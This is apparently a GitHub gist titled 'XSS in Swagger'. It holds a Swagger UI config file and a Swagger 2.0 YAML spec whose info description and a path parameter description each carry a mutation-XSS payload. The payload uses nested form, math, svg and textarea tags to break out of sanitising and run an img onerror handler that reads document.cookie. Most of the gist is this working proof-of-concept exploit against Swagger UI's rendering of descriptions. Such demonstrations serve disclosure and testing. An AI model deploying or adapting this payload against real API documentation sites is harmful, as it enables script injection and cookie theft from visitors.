Skip to content

Instantly share code, notes, and snippets.

@AaronDewes

AaronDewes/xss.json

Last active August 29, 2024 19:12
Show Gist options
  • Save AaronDewes/c9699fc8341a03d2ff47efae3cfb896d to your computer and use it in GitHub Desktop.
Save AaronDewes/c9699fc8341a03d2ff47efae3cfb896d to your computer and use it in GitHub Desktop.
Download ZIP
XSS in Swagger
Raw
xss.json
{
"url": "https://gist.githubusercontent.com/AaronDewes/c9699fc8341a03d2ff47efae3cfb896d/raw/d27103eeb8fefb0811bcd0ef4c9e7298ad8c357c/xss.yaml",
"urls": [
{
"url": "https://gist.githubusercontent.com/AaronDewes/c9699fc8341a03d2ff47efae3cfb896d/raw/d27103eeb8fefb0811bcd0ef4c9e7298ad8c357c/xss.yaml",
"name": "XSS"
}
]
}
Raw
xss.yaml
swagger: '2.0'
info:
title: XSS Attack
description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
version: production
basePath: /
produces:
- application/xml
- application/json
consumes:
- application/xml
- application/json
security:
- basicAuth: []
paths:
/M0X0101:
get:
responses:
'200':
description: No response was specified
tags:
- M0X0101_XSS_D
operationId: findAccounts
summary: Finds all accounts
'/hack/hachid/{id}':
delete:
parameters:
- description: |
<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>
format: int64
in: path
name: id
required: true
type: integer
responses:
'200':
description: No response was specified
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment